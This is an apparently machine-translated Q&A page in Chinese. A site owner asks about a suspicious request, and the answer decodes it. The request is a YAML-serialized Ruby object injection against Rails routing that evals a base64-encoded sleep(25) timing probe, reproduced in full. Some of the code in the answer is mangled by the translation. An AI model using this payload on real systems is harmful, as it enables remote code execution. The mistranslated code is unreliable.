RoR請求黑客入侵。 ---！ruby/hash \ u003aActionDispatch \ u003a \ u003aRouting \ u003a \ RouteSet \ u003a \ NamedRouteCollection

Question

有人試圖'檢查'我的平臺。我得到了這樣的要求：

---- !ruby/hash\u003aActionDispatch\u003a\u003aRouting\u003a\u003aRouteSet\u003a\u003aNamedRouteCollection 'NSFTW;eval(%[c2xlZXAoMjUp].unpack(%[m0])[0]);' \u003a !ruby/object\u003aOpenStruct table\u003a \u003adefaults\u003a {} 

問題是他試圖做什麼？該要求之後的期望是什麼？

Answer 1

嗯，它看起來像YAML序列化Ruby代碼：喜歡的東西

ActionDispatch ::路由:: RouteSet :: NamedRouteCollection 'NSFTW睡眠（25）;'

eval(%[c2xlZXAoMjUp].unpack(%[m0])[0])在irb -session輸出 sleep(25)

，最終來說，我們有一個名爲table一個ruby- OpenStruct對象和defaults財產。

這是否與您的平臺提供的任何服務相匹配？